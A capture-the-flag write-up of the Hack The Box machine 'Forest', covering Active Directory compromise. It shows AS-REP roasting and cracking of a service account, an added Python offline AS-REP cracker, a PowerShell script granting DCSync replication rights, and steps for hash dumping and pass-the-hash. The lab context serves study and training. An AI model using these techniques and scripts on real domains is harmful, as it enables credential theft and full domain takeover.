Hack The Box - Forest Writeup

System Information

 



Initial Enumeration


It is a Windows machine, so we start by enumerating it over SMB/RPC with enum4linux, which gives us the domain name and a list of users:

Domain name: HTB

Users:    
  • andy (Andy hislip)
  • lucinda (Lucinda Berger)
  • sebastien (Sebastien Caron)
  • mark (Mark Brandt)
  • santi (Santi Rodriguez)
  • ezra
  • Svc-alfresco


After some checks we discover that svc-alfresco does not require Kerberos pre-authentication (the DONT_REQ_PREAUTH flag is set on the account), so we can use the Impacket script GetNPUsers.py. Without pre-authentication the KDC answers an AS-REQ for that user from anyone, and the encrypted part of the AS-REP it returns is protected only by a key derived from the user's password, so it can be cracked offline (AS-REP roasting). The script prints that encrypted part in a crackable format; the 23 in the output is the encryption type (RC4-HMAC), whose key is simply the NTLM hash of the password, which is why this cracks fast:

# ./GetNPUsers.py  -request  -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d935a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d

The $krb5asrep... line is in John's krb5asrep format (hashcat mode 18200 accepts the same string), so we can crack it offline with the rockyou wordlist:

# john --wordlist=../../rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 24.38% (ETA: 03:58:12) 0g/s 334503p/s 334503c/s 334503C/s smf1180..smf,727
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:12 DONE (2019-11-04 03:57) 0.08176g/s 334072p/s 334072c/s 334072C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

# john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB:s3rvice

1 password hash cracked, 0 left

This gives us the password s3rvice.
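To see what john is actually doing with that line, here is an added Python example (it is not code from the original write-up) that re-implements the etype 23 AS-REP check offline: NTLM key from the candidate password, RFC 4757 key derivation for key usage 8, RC4 decryption and HMAC-MD5 verification of the checksum. PAGE_HASH is the $krb5asrep$23$ string printed above; WORDLIST is a three-word list constructed for the example in place of rockyou; the MD4 implementation is inlined because many OpenSSL builds no longer expose md4 through hashlib.

```python
# Added example (not the write-up's own code): the offline AS-REP check that
# john/hashcat run per candidate for an etype 23 (RC4-HMAC) AS-REP. MD4 is
# inlined because many OpenSSL builds no longer expose it through hashlib.
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

# PAGE_HASH is copied from the GetNPUsers.py output above; WORDLIST is a
# constructed stand-in for rockyou.
PAGE_HASH = (
    "$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$"
    "fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5"
    "ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74"
    "cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa"
    "1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d9"
    "35a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df"
    "359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8"
    "cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d"
)
WORDLIST = ["password", "Password1", "s3rvice"]


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). NTLM, the etype 23 key, is MD4 over the UTF-16-LE password."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    rounds = (  # (mixing function, additive constant, X index order, shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the old "d"
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation XORed with the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_krb5asrep(line: str) -> dict:
    """Split '$krb5asrep$<etype>$user@REALM:<checksum>$<edata2>' (john / hashcat 18200)."""
    _, tag, etype, rest = line.strip().split("$", 3)
    principal, blob = rest.split(":", 1)
    checksum_hex, edata2_hex = blob.split("$", 1)
    return {"etype": int(etype), "principal": principal,
            "checksum": bytes.fromhex(checksum_hex), "edata2": bytes.fromhex(edata2_hex)}


def asrep_matches(key: bytes, checksum: bytes, edata2: bytes) -> bool:
    """RFC 4757 decrypt-and-verify. The AS-REP enc-part is key usage 3, but
    RC4-HMAC maps usage 3 to 8 (a Windows quirk), so T is 8 here as in john."""
    k1 = hmac.new(key, struct.pack("<I", 8), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plaintext = rc4(k3, edata2)  # 8-byte confounder || DER EncASRepPart
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def crack_asrep(line: str, wordlist):
    """Return the first candidate whose NTLM key verifies the AS-REP, or None."""
    h = parse_krb5asrep(line)
    if h["etype"] != 23:
        raise ValueError("only etype 23 (RC4-HMAC) is handled here")
    for candidate in wordlist:
        if asrep_matches(ntlm_hash(candidate), h["checksum"], h["edata2"]):
            return candidate
    return None
```

crack_asrep(PAGE_HASH, WORDLIST) returns "s3rvice". Two things are worth noticing: the per-candidate cost is one MD4 and three HMAC-MD5 calls, which is why RC4 AS-REPs crack so quickly, and verifying the full checksum gives no false positives, unlike a cheaper check on the decrypted ASN.1 tag alone. Accounts whose AS-REP comes back with AES keys (etype 17/18, which john's banner above also lists) go through PBKDF2 instead and crack far more slowly.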

We can list the shares with this account, which confirms the password is valid over SMB (only the default domain-controller shares are exposed):

smbclient -L 10.10.10.161 -U "htb/svc-alfresco"
Enter HTB\svc-alfresco's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Failed to connect with SMB1 -- no workgroup available


Initial Foothold & User Flag


The same credentials work over WinRM, which gives us a shell as svc-alfresco:

From there we navigate to the Desktop and read the user flag:




Root Flag


Doing further enumeration we discover that svc-alfresco can create new domain users and add them to some groups, including "Exchange Windows Permissions" (the built-in Account Operators group grants exactly this kind of control: over user accounts, and over groups that are not protected by AdminSDHolder). So I created a standard user, added it to that group, and also to "Remote Management Users" so that it can log in over WinRM:


net user nik Nik-1234 /add
net group "Exchange Windows Permissions" nik /ADD /DOMAIN
net localgroup "Remote Management Users" nik /ADD


Once logged in as the new user over WinRM, I ran SharpHound to collect the Active Directory data and loaded it into BloodHound, which shows a possible path to Domain Admins:



It shows a path from my user to the HTB.local domain object: the Exchange Windows Permissions group holds WriteDacl on the domain, and with WriteDacl a member can grant itself any right on that object, including the replication rights that DCSync needs.
This is explained in:

I used this command sequence, run in a PowerShell session as nik on the DC (the ActiveDirectory module and its ad: drive are available there):

Import-Module ActiveDirectory
$acl = get-acl "ad:DC=htb,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
# rightsGuids of the two extended rights a DC checks before answering a
# replication (DCSync) request: Ds-Replication-Get-Changes and Ds-Replication-Get-Changes-All
$replRights = @{
    "DS-Replication-Get-Changes"     = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
    "DS-Replication-Get-Changes-All" = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
}
foreach ($guid in $replRights.Values) {
    $objectGuid = new-object Guid $guid
    $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
    $acl.AddAccessRule($ace)
}
# AddAccessRule only changes the in-memory copy; Set-Acl writes the new DACL back to the DC
Set-Acl -AclObject $acl -Path "ad:DC=htb,DC=local"

Now the user nik holds the DS-Replication-Get-Changes-All extended right on the domain object. The DC checks this right (together with DS-Replication-Get-Changes) before answering a replication request, so a principal that holds them can pull every attribute of every object, password hashes included, exactly as a replication partner would: this is what DCSync does.


Then we can go back to Impacket and use secretsdump.py with nik's credentials; it performs the DCSync against the DC and dumps every account's NT hash and Kerberos keys:

We don't need to crack anything: the Administrator NT hash can be passed straight to Impacket's wmiexec.py (pass-the-hash) to get a shell as Administrator:

and read the root flag.
  

